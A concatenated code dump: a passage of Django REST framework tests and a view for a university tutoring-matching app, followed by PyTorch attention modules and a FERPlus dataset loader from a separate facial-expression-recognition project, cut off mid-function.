self.assertFalse(serializer.is_valid()) data['sun'] = 72698241236 serializer = TimesSerializer(data = data) self.assertTrue(serializer.is_valid()) serializer.save() self.assertEqual(serializer.data['sat'], 3) def test_prof_put(self): user = self.create_user('profPutTestID', 'profPutTestPW') url = '/profile/{0}/'.format(user.id) data = {'major': 'cse', 'contact': '010-1234-5678'} response = self.client.put(url, data) self.assertTrue(response.status_code >= 400) self.client.force_login(user) self.client.get("/users/") before = self.client.get(url).data # self.client.force_authenticate(user=user) self.client.put(url, data) after = self.client.get(url).data self.assertEqual(before["major"], "") self.assertEqual(before["contact"], "010-0000-0000") self.assertEqual(after["major"], "cse") self.assertEqual(after["contact"], "010-1234-5678") response = self.client.put(url, {'contact':'0'}) self.assertTrue(response.status_code >= 400) def test_prof_contact_permission(self): user1 = self.create_user('user1', 'user1') user2 = self.create_user('user2', 'user2') url = '/profiles/' url1 = '/profile/{0}/'.format(user1.id) url2 = '/profile/{0}/'.format(user2.id) self.client.get('/users/') self.client.force_login(user1) prof_list1 = self.client.get(url).data prof1 = self.client.get(url1).data prof2 = self.client.get(url2).data self.assertEqual(prof1['contact'], "010-0000-0000") self.assertEqual(prof2['contact'], "") self.assertEqual(prof_list1[0]['contact'], "010-0000-0000") self.assertEqual(prof_list1[1]['contact'], "") # added 05/05, from tutor_put_request branch def test_tutor_put(self): user = self.create_user('iidd', 'ppww') #login = self.client.login(username = 'iidd', password = '<PASSWORD>') #self.assertTrue(login) tutorid = "/tutor/{0}/".format(user.id) data = {'bio': 'hi', 'exp': 'A'} response = self.client.put(tutorid, data) self.assertTrue(status.is_client_error(response.status_code)) self.client.force_login(user) users = self.client.get("/users/").data profiles = self.client.get("/profiles/").data prev = self.client.get(tutorid).data self.client.put(tutorid, data) curr = self.client.get(tutorid).data self.assertEqual(prev['bio'], "") self.assertEqual(curr['bio'], "hi") self.assertEqual(prev['exp'], "") self.assertEqual(curr['exp'], "A") # added 05/17, from tutor_search_filter branch # added 05/30, from search_tutor_with_lecture branch def test_tutor_filter(self): user = self.create_user('iidd', 'ppww') data = {'bio': 'my bio', 'exp': 'MY EXP'} prof = {'major': 'my major'} other_user = self.create_user('idother', 'pwother') other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'} other_prof = {'major': 'your major'} korean_user = self.create_user('idkorean', 'pwkorean') korean_data = {'bio': '자기소개', 'exp': '경력'} korean_prof = {'major': '전공'} users = self.client.get("/users/").data profiles = self.client.get("/profiles/").data self.client.force_login(user) self.client.put("/tutor/{0}/".format(user.id), data) self.client.put("/profile/{0}/".format(user.id), prof) self.client.force_login(other_user) self.client.put("/tutor/{0}/".format(other_user.id), other_data) self.client.put("/profile/{0}/".format(other_user.id), other_prof) self.client.force_login(korean_user) self.client.put("/tutor/{0}/".format(korean_user.id), korean_data) self.client.put("/profile/{0}/".format(korean_user.id), korean_prof) tutors = self.client.get("/tutors/").data self.assertEqual(len(tutors), 3) tutors = self.client.get("/tutors/?bio=bi&exp=ex").data self.assertEqual(len(tutors), 2) tutors = self.client.get("/tutors/", {'bio': '소개', 'exp': '경'}).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], korean_user.id) tutors = self.client.get("/tutors/", {'bio': 'ur b'}).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], other_user.id) tutors = self.client.get("/tutors/?major=major").data self.assertEqual(len(tutors), 2) tutors = self.client.get("/tutors/", {'major': '전'}).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], korean_user.id) # check for times times1 = {'mon': 0x3DC0, #0b0011110111000000 'tue': 0xD4F0, #0b1101010011110000 'wed': 0x0, 'thu': 0x0, 'fri': 0x0, 'sat': 0x0, 'sun': 0x0} # total 7.5hr times2 = {'mon': 0x0, 'tue': 0x99D0, #0b1001100111010000 'wed': 0xFC7C, #0b1111110001111100 'thu': 0x0, 'fri': 0x0, 'sat': 0x0, 'sun': 0x0} # total 9hr times3 = {'mon': 0xFFFF, #0b1111111111111111 'tue': 0xFFFF, #0b1111111111111111 'wed': 0xFFFF, #0b1111111111111111 'thu': 0xFFFF, #0b1111111111111111 'fri': 0x0, 'sat': 0x0, 'sun': 0x0, 'total': 15} self.client.force_login(user) self.client.put("/times/{0}/".format(user.profile.tutor.times.id), times1) self.client.force_login(other_user) self.client.put("/times/{0}/".format(other_user.profile.tutor.times.id), times2) tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 2) times3['total'] = 18 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], other_user.id) times3['total'] = 12 times3['minInterval'] = 3 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], other_user.id) times3['total'] = 15 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 0) times3['wed'] = 0 times3['total'] = 6 times3['minInterval'] = 2 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], user.id) times3['mon'] = 0xF3E0 #0b1111001111100000 times3['total'] = 7 times3['minInterval'] = 3 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 1) self.assertEqual(tutors[0]['profile']['user'], user.id) times3['total'] = 8 tutors = self.client.get("/tutors/", times3).data self.assertEqual(len(tutors), 0) # check for lectures self.client.force_login(user) self.client.put("/tutor/{0}/".format(user.id), {'lectures': [2, 4, 6]}) self.client.force_login(other_user) self.client.put("/tutor/{0}/".format(other_user.id), {'lectures': [1, 2, 3, 4]}) self.client.force_login(korean_user) self.client.put("/tutor/{0}/".format(korean_user.id), {'lectures': [4, 5]}) tutors = self.client.get("/tutors/?lecture=4").data self.assertEqual(len(tutors), 3) tutors = self.client.get("/tutors/?lecture=2").data self.assertEqual(len(tutors), 2) tutors = self.client.get("/tutors/?lecture=1").data self.assertEqual(len(tutors), 1) tutors = self.client.get("/tutors/?lecture=7").data self.assertEqual(len(tutors), 0) tutors = self.client.get("/tutors/?lecTitle=글쓰기").data self.assertEqual(len(tutors), 3) tutors = self.client.get("/tutors/?lecProf=허윤").data self.assertEqual(len(tutors), 2) def test_tutor_list_ordering(self): user = self.create_user('iidd', 'ppww') data = {'bio': 'my bio', 'exp': 'MY EXP'} prof = {'major': 'my major', 'name':'나나나'} other_user = self.create_user('idother', 'pwother') other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'} other_prof = {'major': 'your major', 'name':'다다다'} korean_user = self.create_user('idkorean', 'pwkorean') korean_data = {'bio': '자기소개', 'exp': '경력'} korean_prof = {'major': '전공', 'name':'가가가'} users = self.client.get("/users/").data profiles = self.client.get("/profiles/").data self.client.force_login(user) self.client.put("/tutor/{0}/".format(user.id), data) self.client.put("/profile/{0}/".format(user.id), prof) self.client.force_login(other_user) self.client.put("/tutor/{0}/".format(other_user.id), other_data) self.client.put("/profile/{0}/".format(other_user.id), other_prof) self.client.force_login(korean_user) self.client.put("/tutor/{0}/".format(korean_user.id), korean_data) self.client.put("/profile/{0}/".format(korean_user.id), korean_prof) tutors = self.client.get("/tutors/").data self.assertEqual(tutors[0]['profile']['name'], "가가가") self.assertEqual(tutors[1]['profile']['name'], "나나나") self.assertEqual(tutors[2]['profile']['name'], "다다다") def test_lectures_database(self): lectures = self.client.get("/lectures/").data self.assertEqual(len(lectures), 30214) lecture = {'title': '궰쇆뮶'} lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 0) lecture = {'prof': '문병로'} lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 5) lecture['title'] = '알고' lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 3) del lecture['prof'] lecture['title'] = '대학 글쓰기 1' lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 35) lecture['prof'] = '나민애' lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 1) lecture['prof'] = '문병로' lectures = self.client.get("/lectures/", lecture).data self.assertEqual(len(lectures), 0) def test_request(self): user1 = self.create_user('id1', 'pw2') user2 = self.create_user('id3', 'pw4') self.client.get("/users/").data self.client.get("/profiles/").data self.client.get("/tutors/").data self.client.force_login(user2) request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b", 'mon': 1, 'tue': 2, 'wed': 1, 'thu': 2, 'fri': 1, 'sat': 2, 'sun': 0} self.assertTrue(self.client.post("/requests/", request).status_code >= 400) times = {'mon': 7, 'tue': 7, 'wed': 7, 'thu': 7, 'fri': 7, 'sat': 7, 'sun': 7} times_id = user1.profile.tutor.times.id tutoringTimes_id = user1.profile.tutor.tutoringTimes.id self.client.put("/times/{0}/".format(times_id), times) self.client.post("/requests/", request) request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b", 'mon': 4, 'tue': 0, 'wed': 2, 'thu': 1, 'fri': 0, 'sat': 0, 'sun': 7} self.client.post("/requests/", request) self.client.delete("/request/2/") self.client.post("/requests/", request) self.client.force_login(user1) self.client.delete("/request/3/") self.client.force_login(user2) requests = self.client.get("/requests/").data self.assertEqual(len(requests), 1) request['sun'] = 8 self.assertTrue(self.client.post("/requests/", request).status_code >= 400) request['sun'] = 0 request['tutee'] = 1 self.assertTrue(self.client.post("/requests/", request).status_code >= 400) self.assertEqual(requests[0]['times']['mon'], 1) self.assertEqual(requests[0]['times']['sat'], 2) request = self.client.get("/request/1/").data self.assertEqual(request['status'], 0) prof = self.client.get('/profile/{0}/'.format(user1.id)).data self.assertEqual(prof['contact'], "") self.client.force_login(user1) request = self.client.put("/request/1/", {'status': 1}).data self.assertEqual(request['status'], 1) request = self.client.get('/times/{0}/'.format(times_id)).data self.assertEqual(request['mon'], 6) self.assertEqual(request['sun'], 7) request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data self.assertEqual(request['sat'], 2) self.assertEqual(request['sun'], 0) times['mon'] = 15 times['tutor'] = user1.id self.assertTrue(self.client.put('/times/{0}/'.format(times_id), times).status_code >= 400) prof = self.client.get('/profile/{0}/'.format(user1.id)).data self.assertEqual(prof['contact'], "010-0000-0000") self.client.force_login(user1) prof = self.client.get('/profile/{0}/'.format(user2.id)).data self.assertEqual(prof['contact'], "010-0000-0000") self.assertEqual(len(prof['notifications']), 2) self.assertFalse(prof['notifications'][0]['read']) notification = self.client.get('/notification/{0}/'.format(prof['notifications'][0]['id'])).data self.assertTrue(notification['read']) self.assertTrue(self.client.get('/notification/9999/').status_code == 404) request = self.client.put("/request/1/", {'status': 2}).data self.assertEqual(request['status'], 2) request = self.client.get('/times/{0}/'.format(times_id)).data self.assertEqual(request['tue'], 7) request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data self.assertEqual(request['wed'], 0) self.assertEqual(request['sun'], 0) self.client.put('/times/{0}/'.format(times_id), times) request = self.client.get('/times/{0}/'.format(times_id)).data self.assertEqual(request['mon'], 15) prof = self.client.get('/profile/{0}/'.format(user2.id)).data self.assertEqual(prof['contact'], "") class HighLevelTests(APITransactionTestCase): def setUp(self): self.User = get_user_model() self.verify_url_matcher = re.compile(r'(\/auth\/activate\/[0-9a-f]+\/)') def register(self, username, email, passwd): return self.client.post('/auth/register/', { 'username': username, 'email': email, 'password1': <PASSWORD>, 'password2': <PASSWORD> }) def verify_email(self, email): resp = None for msg in mail.outbox: if len(msg.to) == 1 and msg.to[0] == email: url = self.verify_url_matcher.search(msg.body) self.assertIsNot(url, None) resp = self.client.get(url.group()) return resp # Naming scheme: foo_s: expect success, foo_f: expect failure def register_s(self, username, email, passwd): resp = self.register(username, email, passwd) self.assertEqual(resp.status_code, 302) self.assertEqual(resp.url, '/auth/register/complete/') ver = self.verify_email(email) self.assertIsNot(ver, None) self.assertEqual(ver.status_code, 302) self.assertEqual(ver.url, '/auth/activate/complete/') def register_f(self, username, email, passwd): failed = False resp = self.register(username, email, passwd) if resp.status_code != 302: failed = True ver = self.verify_email(email) if ver is None or ver.status_code != 302: failed = True # 여기까지 왔다면 망한거! self.assertTrue(failed) def test_registration(self): # 이메일이 snu가 아님 self.register_f('testuser0', '<EMAIL>', '9328h9ih!sdf') # OK self.register_s('testuser0', '<EMAIL>', 'A!98uk_48ohD') # 이메일 중복 self.register_f('dup_email', '<EMAIL>', 'v09#oijsad#S') # 유저네임 중복 self.register_f('testuser0', '<EMAIL>', '0iDSAF2^49oj') # OK self.register_s('testuser1', '<EMAIL>', '(oir!eLI+Esd') # 패스워드 약함 self.register_f('testuser2', '<EMAIL>', 'password') def test_user_current(self): un = 'test' pw = <PASSWORD>' me = self.client.get('/user/current/') self.assertTrue(status.is_client_error(me.status_code)) self.register_s('test', '<EMAIL>', pw) self.client.login(username=un, password=pw) me = self.client.get('/user/current/') self.assertTrue(status.is_success(me.status_code)) self.assertEqual(me.data['username'], un) ``` #### File: swpp/view/times.py ```python from django.shortcuts import render from swpp.models import Times, Tutor from swpp.serializers import TimesSerializer from rest_framework import generics, mixins from rest_framework.response import Response class TimesList(generics.ListAPIView): queryset = Times.objects.all() serializer_class = TimesSerializer class TimesDetails(generics.RetrieveUpdateDestroyAPIView): queryset = Times.objects.all() serializer_class = TimesSerializer def put(self, request, *args, **kwargs): times = Times.objects.get(pk = kwargs['pk']) context = {} if 'tutor' in request.POST: context['tutoringTimes'] = Tutor.objects.get(pk = request.data.get('tutor')).tutoringTimes serializer = TimesSerializer(times, data=request.data, context=context) if serializer.is_valid(): serializer.save() return Response(serializer.data) return Response(serializer.errors, status=400) # return self.update(request, *args, **kwargs) ```
{ "source": "2019ZSS/FER", "score": 3 }
#### File: FER/models/at.py ```python import torch import torch.nn as nn import torch.nn.functional as F class NonLocalBlock(nn.Module): def __init__(self, in_channels: int): super(NonLocalBlock, self).__init__() self.inter_channel = in_channels // 2 self.conv_phi = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel, kernel_size=1, stride=1, padding=0, bias=False) self.conv_theta = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel, kernel_size=1, stride=1, padding=0, bias=False) self.conv_g = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel, kernel_size=1, stride=1, padding=0, bias=False) self.conv_mask = nn.Conv2d(in_channels=self.inter_channel, out_channels=in_channels, kernel_size=1, stride=1, padding=0, bias=False) def forward(self, x): # [B, C, H, W] b, c, h, w = x.size() # [B, C / 2, H * W] x_phi = self.conv_phi(x).view(b, c, -1) # [B, H * W, C/2] x_theta = self.conv_theta(x).view(b, c, -1).permute(0, 2, 1).contiguous() x_g = self.conv_g(x).view(b, c, -1).permute(0, 2, 1).contiguous() # [B, H * W, H * W] mul_theta_phi = F.softmax(torch.matmul(x_theta, x_phi), dim=1) # [B, H*W, C / 2] mul_theta_phi_g = torch.matmul(mul_theta_phi, x_g) # [B, C / 2, H, w] mul_theta_phi_g = mul_theta_phi_g.permute(0,2,1).contiguous().view(b, self.inter_channel, h, w) # [B, C, H , W] mask = self.conv_mask(mul_theta_phi_g) out = mask + x return out class ContextBlock(nn.Module): ''' Global Context Network(GCNet) Paper: Global Context Network(GCNet) Code: https://github.com/xvjiarui/GCNet Analysis: https://blog.csdn.net/sinat_17456165/article/details/106760606 ''' def __init__(self, inplanes, ratio=1.0/16, pooling_type='att', fusion_types=('channel_add', )): super(ContextBlock, self).__init__() valid_fusion_types = ['channel_add', 'channel_mul'] assert pooling_type in ['avg', 'att'] assert isinstance(fusion_types, (list, tuple)) assert all([f in valid_fusion_types for f in fusion_types]) assert len(fusion_types) > 0, 'at least one fusion should be used' self.inplanes = inplanes self.ratio = ratio self.planes = int(inplanes * ratio) self.pooling_type = pooling_type self.fusion_types = fusion_types if pooling_type == 'att': self.conv_mask = nn.Conv2d(inplanes, 1, kernel_size=1) self.softmax = nn.Softmax(dim=2) else: self.avg_pool = nn.AdaptiveAvgPool2d(1) if 'channel_add' in fusion_types: self.channel_add_conv = nn.Sequential( nn.Conv2d(self.inplanes, self.planes, kernel_size=1), nn.LayerNorm([self.planes, 1, 1]), nn.ReLU(inplace=True), # yapf: disable nn.Conv2d(self.planes, self.inplanes, kernel_size=1)) else: self.channel_add_conv = None if 'channel_mul' in fusion_types: self.channel_mul_conv = nn.Sequential( nn.Conv2d(self.inplanes, self.planes, kernel_size=1), nn.LayerNorm([self.planes, 1, 1]), nn.ReLU(inplace=True), # yapf: disable nn.Conv2d(self.planes, self.inplanes, kernel_size=1)) else: self.channel_mul_conv = None def spatial_pool(self, x): batch, channel, height, width = x.size() if self.pooling_type == 'att': input_x = x # [N, C, H * W] input_x = input_x.view(batch, channel, height * width) # [N, 1, C, H * W] input_x = input_x.unsqueeze(1) # [N, 1, H, W] context_mask = self.conv_mask(x) # [N, 1, H * W] context_mask = context_mask.view(batch, 1, height * width) # [N, 1, H * W] context_mask = self.softmax(context_mask) # [N, 1, H * W, 1] context_mask = context_mask.unsqueeze(-1) # [N, 1, C, 1] context = torch.matmul(input_x, context_mask) # [N, C, 1, 1] context = context.view(batch, channel, 1, 1) else: # [N, C, 1, 1] context = self.avg_pool(x) return context def forward(self, x): # [N, C, 1, 1] context = self.spatial_pool(x) out = x if self.channel_mul_conv is not None: # [N, C, 1, 1] channel_mul_term = torch.sigmoid(self.channel_mul_conv(context)) out = out * channel_mul_term if self.channel_add_conv is not None: # [N, C, 1, 1] channel_add_term = self.channel_add_conv(context) out = out + channel_add_term return out class PyramidPooling(nn.Module): """ Reference: Zhao, Hengshuang, et al. *"Pyramid scene parsing network."* """ def __init__(self, in_channels, norm_layer, up_kwargs): super(PyramidPooling, self).__init__() self.pool1 = nn.AdaptiveAvgPool2d(1) self.pool2 = nn.AdaptiveAvgPool2d(2) self.pool3 = nn.AdaptiveAvgPool2d(3) self.pool4 = nn.AdaptiveAvgPool2d(6) out_channels = int(in_channels/4) self.conv1 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False), norm_layer(out_channels), nn.ReLU(True)) self.conv2 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False), norm_layer(out_channels), nn.ReLU(True)) self.conv3 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False), norm_layer(out_channels), nn.ReLU(True)) self.conv4 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False), norm_layer(out_channels), nn.ReLU(True)) # bilinear interpolate options self._up_kwargs = up_kwargs def forward(self, x): _, _, h, w = x.size() feat1 = F.interpolate(self.conv1(self.pool1(x)), (h, w), **self._up_kwargs) feat2 = F.interpolate(self.conv2(self.pool2(x)), (h, w), **self._up_kwargs) feat3 = F.interpolate(self.conv3(self.pool3(x)), (h, w), **self._up_kwargs) feat4 = F.interpolate(self.conv4(self.pool4(x)), (h, w), **self._up_kwargs) return torch.cat((x, feat1, feat2, feat3, feat4), 1) class StripPooling(nn.Module): """ Reference: """ def __init__(self, in_channels, pool_size, up_kwargs, norm_layer=nn.BatchNorm2d): super(StripPooling, self).__init__() self.pool1 = nn.AdaptiveAvgPool2d(pool_size[0]) self.pool2 = nn.AdaptiveAvgPool2d(pool_size[1]) self.pool3 = nn.AdaptiveAvgPool2d((1, None)) self.pool4 = nn.AdaptiveAvgPool2d((None, 1)) inter_channels = int(in_channels/4) self.conv1_1 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False), norm_layer(inter_channels), nn.ReLU(True)) self.conv1_2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False), norm_layer(inter_channels), nn.ReLU(True)) self.conv2_0 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False), norm_layer(inter_channels)) self.conv2_1 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False), norm_layer(inter_channels)) self.conv2_2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False), norm_layer(inter_channels)) self.conv2_3 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (1, 3), 1, (0, 1), bias=False), norm_layer(inter_channels)) self.conv2_4 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (3, 1), 1, (1, 0), bias=False), norm_layer(inter_channels)) self.conv2_5 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False), norm_layer(inter_channels), nn.ReLU(True)) self.conv2_6 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False), norm_layer(inter_channels), nn.ReLU(True)) self.conv3 = nn.Sequential(nn.Conv2d(inter_channels*2, in_channels, 1, bias=False), norm_layer(in_channels)) # bilinear interpolate options self._up_kwargs = up_kwargs def forward(self, x): _, _, h, w = x.size() x1 = self.conv1_1(x) x2 = self.conv1_2(x) x2_1 = self.conv2_0(x1) x2_2 = F.interpolate(self.conv2_1(self.pool1(x1)), (h, w), **self._up_kwargs) x2_3 = F.interpolate(self.conv2_2(self.pool2(x1)), (h, w), **self._up_kwargs) x2_4 = F.interpolate(self.conv2_3(self.pool3(x2)), (h, w), **self._up_kwargs) x2_5 = F.interpolate(self.conv2_4(self.pool4(x2)), (h, w), **self._up_kwargs) x1 = self.conv2_5(F.relu_(x2_1 + x2_2 + x2_3)) x2 = self.conv2_6(F.relu_(x2_5 + x2_4)) out = self.conv3(torch.cat([x1, x2], dim=1)) return F.relu_(x + out) class BilinearCNN(nn.Module): def __init__(self, in_channels=512, inter_channels=512, num_classes=7, drop=0., eps=1e-10): super(BilinearCNN, self).__init__() self._in_channels = in_channels self._inter_channels = inter_channels self._eps = eps if self._in_channels != self._inter_channels: self.conv = nn.Sequential(nn.Conv2d(in_channels=self._in_channels, out_channels=self._inter_channels, kernel_size=1), nn.BatchNorm2d(in_channels), nn.ReLU(True)) self.fc = nn.Linear(in_features=inter_channels**2, out_features=num_classes) self.drop = nn.Dropout(drop) if drop > 0 else nn.Identity() for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu") elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) def forward(self, x): batch_size, in_channels, h, w = x.size() feature_size = h * w if self._in_channels != self._inter_channels: x = self.conv(x) x = x.view(batch_size, self._inter_channels, feature_size) x = (torch.bmm(x, torch.transpose(x, 1, 2)) / feature_size).view(batch_size, -1) x = torch.nn.functional.normalize(torch.sign(x) * torch.sqrt(torch.abs(x) + self._eps)) return self.fc(self.drop(x)) class SEWeightModule(nn.Module): def __init__(self, channels, reduction=16): super(SEWeightModule, self).__init__() self.avg_pool = nn.AdaptiveAvgPool2d(1) self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0) self.relu = nn.ReLU(inplace=True) self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0) self.sigmoid = nn.Sigmoid() def forward(self, x): out = self.avg_pool(x) out = self.fc1(out) out = self.relu(out) out = self.fc2(out) weight = self.sigmoid(out) return weight def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1): """standard convolution with padding""" return nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False) def conv1x1(in_planes, out_planes, stride=1): """1x1 convolution""" return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False) class PSAModule(nn.Module): def __init__(self, inplans, planes, conv_kernels=[3, 5, 7, 9], stride=1, conv_groups=[1, 4, 8, 16]): super(PSAModule, self).__init__() self.conv_1 = conv(inplans, planes//4, kernel_size=conv_kernels[0], padding=conv_kernels[0]//2, stride=stride, groups=conv_groups[0]) self.conv_2 = conv(inplans, planes//4, kernel_size=conv_kernels[1], padding=conv_kernels[1]//2, stride=stride, groups=conv_groups[1]) self.conv_3 = conv(inplans, planes//4, kernel_size=conv_kernels[2], padding=conv_kernels[2]//2, stride=stride, groups=conv_groups[2]) self.conv_4 = conv(inplans, planes//4, kernel_size=conv_kernels[3], padding=conv_kernels[3]//2, stride=stride, groups=conv_groups[3]) self.se = SEWeightModule(planes // 4) self.split_channel = planes // 4 self.softmax = nn.Softmax(dim=1) def forward(self, x): batch_size = x.shape[0] x1 = self.conv_1(x) x2 = self.conv_2(x) x3 = self.conv_3(x) x4 = self.conv_4(x) feats = torch.cat((x1, x2, x3, x4), dim=1) feats = feats.view(batch_size, 4, self.split_channel, feats.shape[2], feats.shape[3]) x1_se = self.se(x1) x2_se = self.se(x2) x3_se = self.se(x3) x4_se = self.se(x4) x_se = torch.cat((x1_se, x2_se, x3_se, x4_se), dim=1) attention_vectors = x_se.view(batch_size, 4, self.split_channel, 1, 1) attention_vectors = self.softmax(attention_vectors) feats_weight = feats * attention_vectors for i in range(4): x_se_weight_fp = feats_weight[:, i, :, :] if i == 0: out = x_se_weight_fp else: out = torch.cat((x_se_weight_fp, out), 1) return out if __name__=='__main__': model = NonLocalBlock(in_channels=16) print(model) input = torch.randn(1, 16, 64, 64) out = model(input) print(out.shape) in_tensor = torch.ones((12, 64, 128, 128)) cb = ContextBlock(inplanes=64, ratio=1./16.,pooling_type='att') out_tensor = cb(in_tensor) print(in_tensor.shape) print(out_tensor.shape) in_channels = 64 pool_size = (3, 3) norm_layer = nn.BatchNorm2d up_kwargs = { 'scale_factor': None, 'mode': 'bilinear', 'align_corners': False } x = torch.rand(size=(4, in_channels, 16, 16)) sp = StripPooling(in_channels, pool_size, up_kwargs, norm_layer) y = sp(x) print(x.shape, y.shape) in_channels = 512 inter_channels = 512 x = torch.randn(size=(4, in_channels, 16, 16)) model = BilinearCNN(in_channels=in_channels, inter_channels=inter_channels, drop=0.5) y = model(x) print(x.shape, y.shape) x = torch.rand(size=(4, 64, 224, 224)) model = PSAModule(inplans=64, planes=64, stride=2) y = model(x) print(x.shape, y.shape) ``` #### File: FER/models/lightcnn_at.py ```python import torch.nn as nn from .lightcnn import LightCNN, LowHead from .at import ( ContextBlock, StripPooling, ) def getATModule(at_type): if at_type == 'CB': return ContextBlock if at_type == 'SP': return StripPooling raise NotImplementedError('{} not implemented'.format(at_type)) class LightCNNAT(LightCNN): def __init__(self, low_head, at_type, at_kws, filters=[64, 128, 256, 512, 1024], num_classes=7, at_layer=[0, 0, 0, 0, 1]): super(LightCNNAT, self).__init__(low_head, filters, num_classes) at_model = getATModule(at_type) self.at_layer = at_layer if self.at_layer[0]: self.at0 = at_model(**at_kws[0]) if self.at_layer[1]: self.at1 = at_model(**at_kws[1]) if self.at_layer[2]: self.at2 = at_model(**at_kws[2]) if self.at_layer[3]: self.at3 = at_model(**at_kws[3]) if self.at_layer[4]: self.at4 = at_model(**at_kws[4]) for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu") elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) def forward(self, x): x = self.low_head(x) if self.at_layer[0]: x = self.at0(x) x = self.layer1(x) if self.at_layer[1]: x = self.at1(x) x = self.layer2(x) if self.at_layer[2]: x = self.at2(x) x = self.layer3(x) if self.at_layer[3]: x = self.at3(x) x = self.layer4(x) if self.at_layer[4]: x = self.at4(x) x = self.avgpool(x) x = x.view(x.size(0), -1) x = self.fc(x) return x def make_lightcnn_at(in_channels, at_type, at_kws, num_classes=7, weight_path="", filters=[64, 128, 256, 518, 1024], at_layer=[0, 0, 0, 0, 1], drop=0.): filters = filters low_head = LowHead(in_channels, filters[0]) at_layer = at_layer model = LightCNNAT(low_head=low_head, at_type=at_type, at_kws=at_kws, filters=filters, num_classes=num_classes, at_layer=at_layer) if drop > 0: model.fc = nn.Sequential( nn.Dropout(drop), nn.Linear(filters[-1], num_classes) ) return model def lightcnn_at(in_channels, num_classes=7, weight_path="", **kw): filters = kw['filters'] if 'filters' in kw else [64, 128, 256, 518, 1024] at_layer = kw['at_layer'] if 'at_layer' in kw else [0, 0, 0, 0, 1] drop = kw['drop'] if 'drop' in kw else 0.0 at_type = kw['at_type'] if 'at_type' in kw else 'CB' at_kws = kw['at_kws'] if 'at_kws' in kw else [ { 'inplanes': filters[i] } for i in range(len(filters)) ] return make_lightcnn_at(in_channels=in_channels, at_type=at_type, at_kws=at_kws, num_classes=num_classes, weight_path=weight_path, filters=filters, at_layer=at_layer, drop=drop) ``` #### File: utils/datasets/ferplus_dataset.py ```python from torchvision.transforms import ToTensor, Normalize from torch.utils.data import Dataset from skimage import io from PIL import Image import numpy as np import pandas import torch # Standard Libraries from os import path, listdir import sys import csv import re # Modules from utils import uimage from utils.augmenters.augment import seg class FERPlus(Dataset): def __init__(self, idx_set=0, image_size=(96, 96), tta=False, tta_size=48, max_loaded_images_per_label=10000, transforms=None, base_path_to_FER_plus=None): """ Code based on https://github.com/microsoft/FERPlus. :param idx_set: Labeled = 0, Validation = 1, Test = 2 :param max_loaded_images_per_label: Maximum number of images per label :param transforms: transforms (callable, optional): Optional transform to be applied on a sample. """ self.idx_set = idx_set self.max_loaded_images_per_label = max_loaded_images_per_label self.transforms = transforms self.base_path_to_FER_plus = base_path_to_FER_plus self.fer_sets = {0: 'FER2013Train/', 1: 'FER2013Valid/', 2: 'FER2013Test/'} self.image_size = image_size self._tta = tta self._tta_size = tta_size # Default values self.num_labels = 8 self.mean = [0.0, 0.0, 0.0] self.std = [1.0, 1.0, 1.0] # Load data self.loaded_data = self._load() print('Size of the loaded set: {}'.format(self.loaded_data[0].shape[0])) def is_tta(self): return self._tta == True def __len__(self): return self.loaded_data[0].shape[0] def __getitem__(self, idx): sample = {'image': self.loaded_data[0][idx], 'emotion': self.loaded_data[1][idx]} # train if self.idx_set == 